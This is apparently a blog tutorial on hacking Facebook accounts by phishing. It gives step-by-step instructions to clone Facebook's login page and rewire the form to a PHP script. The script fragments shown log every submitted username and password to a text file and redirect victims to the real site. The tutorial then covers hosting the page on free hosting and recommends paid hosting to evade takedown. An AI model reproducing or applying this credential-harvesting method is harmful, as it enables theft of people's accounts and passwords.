Hello guys, it’s been a quite long time I have delivered you some good stuff, so today I decided to write about hacking Facebook accounts by phishing. Generally, phishing is stealing usernames and passwords using a fake page. Suppose, you want to hack a victim’s Facebook account, so you create a page which looks very similar to facebook and host it somewhere so that your victim can login. When the victim tries to log into his account, he is redirected to the given page and his credentials are sent to you through an email or simply get recorded in some text file.
Today we are going to create a Facebook phishing using simple HTML and PHP coding. Let’s get started..!!!
Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.
Copy the complete source code and paste it in notepad or some other text editor (I use Notepad++) for further editing.
Step 2: Find for something which looks like this :
Step 3: Then change the action URL to login.php, now it will look similar to this.
Save it as index.html.
Step 4: Open a notepad and paste the following code inside it and save as login.php.
header (‘Location: http://www.facebook.com’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)
Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.
Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt.
Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim.
Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.
Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.
Step 8: Then click on File Manager
Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.
Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below.
Once you get your files uploaded you can check your page at your registered domain.
The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password!
Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also.
Feel free to comment below, I might come up with an article describing the procedure to host the webpage on your system. So stay tuned and keep yourself updated.
Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.